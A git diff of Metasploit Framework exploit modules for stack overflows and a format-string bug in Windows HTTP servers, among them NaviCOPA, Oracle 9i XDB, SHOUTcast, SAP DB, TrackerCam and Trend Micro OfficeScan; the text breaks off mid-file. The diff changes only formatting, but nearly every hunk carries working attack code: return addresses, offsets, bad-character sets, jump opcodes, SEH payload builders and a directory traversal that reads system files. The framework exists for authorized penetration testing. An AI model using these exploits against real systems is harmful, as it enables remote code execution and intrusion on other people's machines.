@@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '11530'], [ 'BID', '11620'], [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html'], - ], 'Privileged' => false, 'Payload' => @@ -48,10 +44,9 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40", 'MinNops' => 64, 'StackAdjustment' => -3500, - }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows 2000 SP0-SP3 English', { 'Rets' => [ 1787, 0x7754a3ab ]}], # jmp esp ['Windows 2000 SP4 English', { 'Rets' => [ 1787, 0x7517f163 ]}], # jmp esp @@ -70,12 +65,12 @@ class Metasploit3 < Msf::Exploit::Remote uri = rand_text_alphanumeric(target['Rets'][0]) uri << [target['Rets'][1]].pack('V') uri << payload.encoded - + print_status("Trying target address 0x%.8x..." % target['Rets'][1]) send_request_raw({ 'uri' => uri }, 5) - + handler end diff --git a/modules/exploits/windows/http/navicopa_get_overflow.rb b/modules/exploits/windows/http/navicopa_get_overflow.rb index ea19125372..2f7c9ed738 100644 --- a/modules/exploits/windows/http/navicopa_get_overflow.rb +++ b/modules/exploits/windows/http/navicopa_get_overflow.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'NaviCOPA 2.0.1 URL Handling Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in NaviCOPA 2.0.1. + This module exploits a stack overflow in NaviCOPA 2.0.1. The vulnerability is caused due to a boundary error within the handling of URL parameters. }, @@ -47,44 +45,47 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['NaviCOPA 2.0.1 Universal', { 'Ret' => 0x1009b4ff }], # IV320009.dll ], 'DisclosureDate' => 'Sep 28 2006', 'DefaultTarget' => 0)) - - register_options( [ Opt::RPORT(80) ], self.class ) + + register_options( + [ + Opt::RPORT(80) + ], self.class ) end def check connect - + sock.put("GET / HTTP/1.0\r\n\r\n") resp = sock.get_once disconnect - - if (resp =~ /2.01 11th September/) - return Exploit::CheckCode::Vulnerable - end - return Exploit::CheckCode::Safe + + if (resp =~ /2.01 11th September/) + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Safe end def exploit connect - + sploit = rand_text_alphanumeric(228, payload_badchars) - sploit << [target.ret].pack('V') + payload.encoded - + sploit << [target.ret].pack('V') + payload.encoded + uri = '/' + sploit - + res = "GET #{uri} HTTP/1.1\r\n\r\n" print_status("Trying target %s" % target.name) sock.put(res) sock.close - + handler disconnect end diff --git a/modules/exploits/windows/http/novell_messenger_acceptlang.rb b/modules/exploits/windows/http/novell_messenger_acceptlang.rb index 9037bfe0c9..8c038f3e62 100644 --- a/modules/exploits/windows/http/novell_messenger_acceptlang.rb +++ b/modules/exploits/windows/http/novell_messenger_acceptlang.rb @@ -3,23 +3,21 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Novell Messenger Server 2.0 Accept-Language Overflow', 'Description' => %q{ This module exploits a stack overflow in Novell GroupWise @@ -28,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote To overwrite the return address on the stack, we must first pass a memcpy() operation that uses pointers we supply. Due to the large list of restricted characters and the limitations of the current - encoder modules, very few payloads are usable. + encoder modules, very few payloads are usable. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -42,18 +40,18 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => true, 'Payload' => { - 'Space' => 500, + 'Space' => 500, 'BadChars' => "\x00\x0a\x2c\x3b"+ [*("A".."Z")].join, 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Groupwise Messenger DClient.dll v10510.37', { 'Rets' => [0x6103c3d3, 0x61041010] }], ], 'DisclosureDate' => 'Apr 13 2006')) - - register_options( [ Opt::RPORT(8300) ], self.class ) + + register_options( [ Opt::RPORT(8300) ], self.class ) end def exploit @@ -65,13 +63,13 @@ class Metasploit3 < Msf::Exploit::Remote lang[264, 4] = [target['Rets'][0]].pack('V') # JMP ESP lang[268, 2] = "\xeb\x06" lang[276, payload.encoded.length] = payload.encoded - + res = "GET / HTTP/1.1\r\nAccept-Language: #{lang}\r\n\r\n" - + print_status("Trying target address 0x%.8x..." % target['Rets'][0]) sock.put(res) sock.close - + handler disconnect end diff --git a/modules/exploits/windows/http/nowsms.rb b/modules/exploits/windows/http/nowsms.rb index 006f12a6bb..23b9703df9 100644 --- a/modules/exploits/windows/http/nowsms.rb +++ b/modules/exploits/windows/http/nowsms.rb @@ -3,28 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Now SMS/MMS Gateway Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Now SMS/MMS Gateway v2007.06.27. - By sending a specially crafted GET request, an attacker may be able to execute - arbitrary code. + By sending a specially crafted GET request, an attacker may be able to execute + arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -47,22 +45,21 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Now SMS/MMS Gateway v2007.06.27', { 'Ret' => 0x10002f9d } ], # CALL ESP : SMSHMAC.DLL ], - 'DefaultTarget' => 0, + 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 19 2008')) - - register_options( [ Opt::RPORT(8800) ], self.class ) + register_options( [ Opt::RPORT(8800) ], self.class ) end def exploit c = connect data = Rex::Text.encode_base64(rand_text_english(129) + [target.ret].pack('V') + payload.encoded) - + print_status("Trying target #{target.name}...") res = send_request_raw({ @@ -75,6 +72,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) handler - end - + end + end diff --git a/modules/exploits/windows/http/oracle9i_xdb_pass.rb b/modules/exploits/windows/http/oracle9i_xdb_pass.rb index 63a67256c6..971511209e 100644 --- a/modules/exploits/windows/http/oracle9i_xdb_pass.rb +++ b/modules/exploits/windows/http/oracle9i_xdb_pass.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Oracle 9i XDB HTTP PASS Overflow (win32)', 'Description' => %q{ - This module exploits a stack overflow in the authorization + This module exploits a stack overflow in the authorization code of the Oracle 9i HTTP XDB service. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on "Variations @@ -51,15 +49,17 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Oracle 9.2.0.1 Universal', { 'Ret' => 0x60616d46 } ], ], - 'DefaultTarget' => 0, + 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 18 2003')) - - register_options( [ Opt::RPORT(8080) ], self.class ) + register_options( + [ + Opt::RPORT(8080) + ], self.class ) end def check @@ -67,29 +67,29 @@ class Metasploit3 < Msf::Exploit::Remote sock.put("GET / HTTP/1.0\r\n\r\n") resp = sock.get_once disconnect - + if (resp =~ /9.2.0.1.0/) return Exploit::CheckCode::Vulnerable - end + end return Exploit::CheckCode::Safe end def exploit connect - sploit = rand_text_english(4, payload_badchars) + ":" - sploit << rand_text_english(442, payload_badchars) - sploit << "\xeb\x64" + make_nops(2) + [target.ret].pack('V') + sploit = rand_text_english(4, payload_badchars) + ":" + sploit << rand_text_english(442, payload_badchars) + sploit << "\xeb\x64" + make_nops(2) + [target.ret].pack('V') sploit << make_nops(266) + "\xeb\x10" + make_nops(109) + payload.encoded - req = "Authorization: Basic #{Rex::Text.encode_base64(sploit)}\r\n\r\n" - - res = "GET / HTTP/1.1\r\n" + "Host: #{rhost}:#{rport}\r\n" + req - + req = "Authorization: Basic #{Rex::Text.encode_base64(sploit)}\r\n\r\n" + + res = "GET / HTTP/1.1\r\n" + "Host: #{rhost}:#{rport}\r\n" + req + print_status("Trying target %s..." % target.name) - + sock.put(res) - + handler disconnect end diff --git a/modules/exploits/windows/http/peercast_url.rb b/modules/exploits/windows/http/peercast_url.rb index 7668491441..b75de863c7 100644 --- a/modules/exploits/windows/http/peercast_url.rb +++ b/modules/exploits/windows/http/peercast_url.rb @@ -3,29 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'PeerCast <= 0.1216 URL Handling Buffer Overflow (win32)', 'Description' => %q{ - This module exploits a stack overflow in PeerCast <= v0.1216. + This module exploits a stack overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters. - }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -36,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote ['OSVDB', '23777'], ['BID', '17040'], ['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'], - ], 'Privileged' => false, 'Payload' => @@ -46,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }], ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }], @@ -54,26 +50,26 @@ class Metasploit3 < Msf::Exploit::Remote ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }], ], 'DisclosureDate' => 'Mar 8 2006')) - - register_options( [ Opt::RPORT(7144) ], self.class ) + + register_options( [ Opt::RPORT(7144) ], self.class ) end def exploit connect - + pat = rand_text_alphanumeric(1024) pat[768, 4] = [target.ret].pack('V') pat[812, 5] = [0xe9, -517].pack('CV') pat[300, payload.encoded.length] = payload.encoded - + uri = '/stream/?' + pat - + res = "GET #{uri} HTTP/1.0\r\n\r\n" - + print_status("Trying target address 0x%.8x..." % target.ret) sock.put(res) sock.close - + handler disconnect end diff --git a/modules/exploits/windows/http/privatewire_gateway.rb b/modules/exploits/windows/http/privatewire_gateway.rb index b77d1f5ff8..0c59cd78e1 100644 --- a/modules/exploits/windows/http/privatewire_gateway.rb +++ b/modules/exploits/windows/http/privatewire_gateway.rb @@ -3,30 +3,28 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - # This file may only be distributed as part of the Metasploit Framework. # Any other use needs a written permission from the author. require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Private Wire Gateway Buffer Overflow', 'Description' => %q{ - This exploits a buffer overflow in the ADMCREG.EXE used - in the PrivateWire Online Registration Facility. + This exploits a buffer overflow in the ADMCREG.EXE used + in the PrivateWire Online Registration Facility. }, 'Author' => 'Michael Thumann <mthumann[at]ernw.de>', 'License' => MSF_LICENSE, @@ -44,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows 2000 English SP0', { 'Ret' => 0x77e3c289 }], # jmp esp user32.dll ['Windows 2000 English SP1', { 'Ret' => 0x77e3cb4c }], # jmp esp user32.dll @@ -53,22 +51,22 @@ class Metasploit3 < Msf::Exploit::Remote ['Windows 2000 English SP4', { 'Ret' => 0x77e3c256 }], # jmp esp user32.dll ['Windows 2003 English SP0/SP1', { 'Ret' => 0x77d74c94 }], # jmp esp user32.dll ['Debugging', { 'Ret' => 0x41414141 }], # crash - ], + ], 'DefaultTarget' => 4, 'DisclosureDate' => 'Jun 26 2006')) - - register_options( - [ - OptString.new('PATH', [ true, "Installation path of Privatewire", 'C:\Cipgw' ]) - ], self.class) + + register_options( + [ + OptString.new('PATH', [ true, "Installation path of Privatewire", 'C:\Cipgw' ]) + ], self.class) end def exploit # add 25 to ecx and jmp jmp = "\x6a\x19\x58\x01\xc1\xff\xe1" - + path_offset = datastore['PATH'].length - 8 - + pattern = rand_text_alphanumeric(8192) pattern[0, payload.encoded.length] = payload.encoded pattern[8156 - path_offset, 4] = [target.ret].pack('V') diff --git a/modules/exploits/windows/http/sapdb_webtools.rb b/modules/exploits/windows/http/sapdb_webtools.rb index 1c5dee7232..d256d61bf0 100644 --- a/modules/exploits/windows/http/sapdb_webtools.rb +++ b/modules/exploits/windows/http/sapdb_webtools.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -20,14 +18,14 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'SAP DB 7.4 WebTools Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in SAP DB 7.4 WebTools. - By sending an overly long GET request, it may be possible for - an attacker to execute arbitrary code. Using the PAYLOAD of - windows/shell_bind_tcp or windows/shell_reverse_tcp allows - for the most reliable results. + By sending an overly long GET request, it may be possible for + an attacker to execute arbitrary code. Using the PAYLOAD of + windows/shell_bind_tcp or windows/shell_reverse_tcp allows + for the most reliable results. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -52,31 +50,31 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ 'SAP DB 7.4 WebTools', { 'Ret' => 0x1003c95a } ], # wapi.dll 7.4.3.0 + [ 'SAP DB 7.4 WebTools', { 'Ret' => 0x1003c95a } ], # wapi.dll 7.4.3.0 ], 'DisclosureDate' => 'July 5 2007', 'DefaultTarget' => 0)) - register_options( [ Opt::RPORT(9999) ], self.class ) + register_options( [ Opt::RPORT(9999) ], self.class ) end def exploit c = connect - + filler = rand_text_alphanumeric(20774) seh = generate_seh_payload(target.ret) # pretty big... sploit = filler + seh + rand_text_alphanumeric(3000) print_status("Trying to exploit target #{target.name} 0x%.8x" % target.ret) - + res = send_request_raw({ 'uri' => '/webdbm', 'query' => 'Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE=' + sploit }, 5) - + handler end diff --git a/modules/exploits/windows/http/shoutcast_format.rb b/modules/exploits/windows/http/shoutcast_format.rb index 798dfcd0a6..9b1a3ac45d 100644 --- a/modules/exploits/windows/http/shoutcast_format.rb +++ b/modules/exploits/windows/http/shoutcast_format.rb @@ -3,31 +3,28 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow', 'Description' => %q{ - This module exploits a format string vulnerability in the + This module exploits a format string vulnerability in the Nullsoft SHOUTcast server for Windows. The vulnerability is triggered by requesting a file path that contains format string specifiers. This vulnerability was discovered by Tomasz Trojanowski and Damian Put. - }, 'Author' => [ 'MC', 'mandragore[at]gmail.com'], 'License' => MSF_LICENSE, @@ -37,10 +34,9 @@ class Metasploit3 < Msf::Exploit::Remote [ 'CVE', '2004-1373'], [ 'OSVDB', '12585'], [ 'BID', '12096'], - ], 'Privileged' => false, - 'DefaultOptions' => + 'DefaultOptions' => { 'EXITFUNC' => 'process', }, @@ -49,36 +45,35 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 250, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 'StackAdjustment' => -3500, - }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows NT SP5/SP6a English', { 'Ret' => 0x776a1799 }], # ws2help.dll ['Windows 2000 English ALL', { 'Ret' => 0x75022ac4 }], # ws2help.dll ['Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad }], # ws2help.dll - ['Windows 2003 Server English', { 'Ret' => 0x7ffc0638 }], # PEB return + ['Windows 2003 Server English', { 'Ret' => 0x7ffc0638 }], # PEB return ], 'DisclosureDate' => 'Dec 23 2004')) - - register_options( - [ - Opt::RPORT(8000) - ], self.class) + + register_options( + [ + Opt::RPORT(8000) + ], self.class) end def check r = send_request_raw({ 'uri' => uri }, 5) - + return Exploit::CheckCode::Safe if not r - + m = r.body.match(/Network Audio Server\/([^\s]+)\s+([^<]+)<BR/) return Exploit::CheckCode::Safe if not m - + print_status("This system is running SHOUTcast #{m[1]} on #{m[2]}") - + # SHOUTcast Distributed Network Audio Server/win32 v1.9.2<BR> if (m[1] =~ /v1\.([0-8]\.|9\.[0-3])$/) if (m[2] == "win32") @@ -86,16 +81,16 @@ class Metasploit3 < Msf::Exploit::Remote end print_status("Vulnerable version detected, but not a win32 host") end - + return Exploit::CheckCode::Safe end def exploit - + num = 1046 - payload.encoded.length uri = '/content/%#0' + num.to_s + 'x' + payload.encoded uri << "\xeb\x06" + rand_text_alphanumeric(2) - uri << [target.ret].pack('V') + uri << [target.ret].pack('V') uri << "\xe9\x2d\xff\xff\xff" uri << '#0100x.mp3' @@ -103,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote send_request_raw({ 'uri' => uri }, 5) - + handler disconnect end diff --git a/modules/exploits/windows/http/shttpd_post.rb b/modules/exploits/windows/http/shttpd_post.rb index 9af7122e3e..af6df4b76c 100644 --- a/modules/exploits/windows/http/shttpd_post.rb +++ b/modules/exploits/windows/http/shttpd_post.rb @@ -3,29 +3,27 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking -include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'SHTTPD <= 1.34 URI-Encoded POST Request Overflow (win32)', 'Description' => %q{ - This module exploits a stack overflow in SHTTPD <= 1.34. + This module exploits a stack overflow in SHTTPD <= 1.34. The vulnerability is caused due to a boundary error within the handling of POST requests. Based on an original exploit by skOd - but using a different method found by hdm. + but using a different method found by hdm. }, 'Author' => [ 'LMH <lmh [at] info-pull.com>', 'hdm', 'skOd'], 'License' => MSF_LICENSE, @@ -43,7 +41,7 @@ include Msf::Exploit::Remote::Tcp 'BadChars' => "\x00", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # Except for Spanish locale target, all come from: # http://metasploit.com/users/opcode/msfopcode.cgi @@ -59,13 +57,16 @@ include Msf::Exploit::Remote::Tcp [ 'Windows XP English SP0-SP1', { 'Ret' => 0x71aa1aaa } ], ], 'DisclosureDate' => 'Oct 6 2006')) - - register_options( [ Opt::RPORT(80) ], self.class ) + + register_options( + [ + Opt::RPORT(80) + ], self.class ) end def exploit connect - + pat = rand_text_alphanumeric(4000) pat[8,4] = [target.ret].pack('V') pat[103, payload.encoded.length] = payload.encoded @@ -76,7 +77,7 @@ include Msf::Exploit::Remote::Tcp print_status("Trying target address 0x%.8x..." % target.ret) sock.put(res) sock.close - + handler disconnect end diff --git a/modules/exploits/windows/http/sybase_easerver.rb b/modules/exploits/windows/http/sybase_easerver.rb index 183f2fada9..cfa9c94d23 100644 --- a/modules/exploits/windows/http/sybase_easerver.rb +++ b/modules/exploits/windows/http/sybase_easerver.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Sybase EAServer 5.2 Remote Stack Overflow', 'Description' => %q{ - This module exploits a stack overflow in the Sybase EAServer Web + This module exploits a stack overflow in the Sybase EAServer Web Console. The offset to the SEH frame appears to change depending on what version of Java is in use by the remote server, making this exploit somewhat unreliable. @@ -46,25 +44,23 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 1000, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\%", 'StackAdjustment' => -3500, - }, 'Platform' => 'win', - 'Targets' => - [ + 'Targets' => + [ # Technically we could combine these into a single multi-return string... - ['Windows All - Sybase EAServer 5.2 - jdk 1.3.1_11', {'Ret' => 0x6d4548ff, 'Offset' => 3820}], - ['Windows All - Sybase EAServer 5.2 - jdk 1.3.?.?', {'Ret' => 0x6d4548ff, 'Offset' => 3841}], - ['Windows All - Sybase EAServer 5.2 - jdk 1.4.2_06', {'Ret' => 0x08041b25, 'Offset' => 3912}], - ['Windows All - Sybase EAServer 5.2 - jdk 1.4.1_02', {'Ret' => 0x08041b25, 'Offset' => 3925}], + ['Windows All - Sybase EAServer 5.2 - jdk 1.3.1_11', {'Ret' => 0x6d4548ff, 'Offset' => 3820}], + ['Windows All - Sybase EAServer 5.2 - jdk 1.3.?.?', {'Ret' => 0x6d4548ff, 'Offset' => 3841}], + ['Windows All - Sybase EAServer 5.2 - jdk 1.4.2_06', {'Ret' => 0x08041b25, 'Offset' => 3912}], + ['Windows All - Sybase EAServer 5.2 - jdk 1.4.1_02', {'Ret' => 0x08041b25, 'Offset' => 3925}], ], 'DisclosureDate' => 'Jul 25 2005')) - register_options( - [ - OptString.new('DIR', [ true, "Directory of Login.jsp script", '/WebConsole/' ]), - Opt::RPORT(8080) - ], self.class) - + register_options( + [ + OptString.new('DIR', [ true, "Directory of Login.jsp script", '/WebConsole/' ]), + Opt::RPORT(8080) + ], self.class) end def exploit @@ -86,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', } }, 5) - + print_status("Overflow request sent, sleeping for four seconds") sleep(4) end diff --git a/modules/exploits/windows/http/trackercam_phparg_overflow.rb b/modules/exploits/windows/http/trackercam_phparg_overflow.rb index d62a026df4..8b407225bd 100644 --- a/modules/exploits/windows/http/trackercam_phparg_overflow.rb +++ b/modules/exploits/windows/http/trackercam_phparg_overflow.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -20,16 +18,15 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'TrackerCam PHP Argument Buffer Overflow', 'Description' => %q{ - This module exploits a simple stack overflow in the + This module exploits a simple stack overflow in the TrackerCam web server. All current versions of this software are vulnerable to a large number of security issues. This module abuses the directory traversal flaw to gain information about the system and then uses the PHP overflow to execute arbitrary code. - }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -41,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '13955'], [ 'BID', '12592'], [ 'URL', 'http://aluigi.altervista.org/adv/tcambof-adv.txt'], - ], 'Privileged' => true, 'DefaultOptions' => @@ -53,28 +49,27 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 2048, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 'StackAdjustment' => -3500, - }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # EyeWD.exe has a null and we can not use a partial overwrite. # All of the loaded application DLLs have a null in the address, # except CPS.dll, which moves around between instances :-( - + ['Windows 2000 English', { 'Ret' => 0x75022ac4 }], # ws2help.dll ['Windows XP English SP0/SP1', { 'Ret' => 0x71aa32ad }], # ws2help.dll ['Windows NT 4.0 SP4/SP5/SP6', { 'Ret' => 0x77681799 }], # ws2help.dll - - # Windows XP SP2 and Windows 2003 are not supported yet :-/ + + # Windows XP SP2 and Windows 2003 are not supported yet :-/ ], 'DisclosureDate' => 'Feb 18 2005', 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(8090) - ], self.class) + register_options( + [ + Opt::RPORT(8090) + ], self.class) end def check @@ -82,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => '/tuner/ComGetLogFile.php3', 'query' => 'fn=../HTTPRoot/socket.php3' }, 5) - + if (res and res.body =~ /fsockopen/) fp = fingerprint() print_status("Detected a vulnerable TrackerCam installation on #{fp}") @@ -90,25 +85,25 @@ class Metasploit3 < Msf::Exploit::Remote end return Exploit::CheckCode::Safe end - + def exploit c = connect - + buf = rand_text_english(8192) seh = generate_seh_payload(target.ret) buf[257, seh.length] = seh - + print_status("Sending request...") res = send_request_raw({ 'uri' => '/tuner/TunerGuide.php3', 'query' => 'userID=' + buf }, 5) - + handler end def download(path) - + res = send_request_raw({ 'uri' => '/tuner/ComGetLogFile.php3', 'query' => 'fn=' + ("../" * 10) + path @@ -120,31 +115,31 @@ class Metasploit3 < Msf::Exploit::Remote return if not m return m[1] end - + def fingerprint - + res = download(rand_text_alphanumeric(12) + '.txt') return if not res - + m = res.match(/in <b>(.*)<\/b> on line/smi) return if not m - + path = m[1] - + print_status("TrackerCam installation path is #{path}") - - if (path !~ /^C/i) + + if (path !~ /^C/i) print_status("TrackerCam is not installed on the system drive, we can't fingerprint it") return end - - if (path !~ /Program Files/i) + + if (path !~ /Program Files/i) print_status("TrackerCam is installed in a non-standard location") - end - + end + boot = download('boot.ini') return if not boot - + case boot when /Windows XP.*NoExecute/i return "Windows XP SP2+" @@ -156,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote return "Windows 2000" else return "Unknown OS/SP" - end + end end - + end diff --git a/modules/exploits/windows/http/trendmicro_officescan.rb b/modules/exploits/windows/http/trendmicro_officescan.rb index 1cdf16b78e..d1aac1eb1e 100644 --- a/modules/exploits/windows/http/trendmicro_officescan.rb +++ b/modules/exploits/windows/http/trendmicro_officescan.rb @@ -1,19 +1,28 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' require 'metasm' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Trend Micro OfficeScan Remote Stack Overflow', 'Description' => %q{ - This module exploits a stack overflow in Trend Micro OfficeScan + This module exploits a stack overflow in Trend Micro OfficeScan cgiChkMasterPwd.exe (running with SYSTEM privileges). - }, 'Author' => [ 'toto' ], 'License' => MSF_LICENSE, @@ -42,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # return addresses need to be alphanumeric (here in loadhttp data section) [ 'Windows 2000 - Trend Micro OfficeScan 7.3.0.1293)', { 'Rets' => [0x63613035, 0x63613032] } ], @@ -50,14 +59,14 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Jun 28 2007', 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(8080), - ], self.class) + register_options( + [ + Opt::RPORT(8080), + ], self.class) end def exploit - geip_src = " + geip_src = " push esi push esp pop eax @@ -71,10 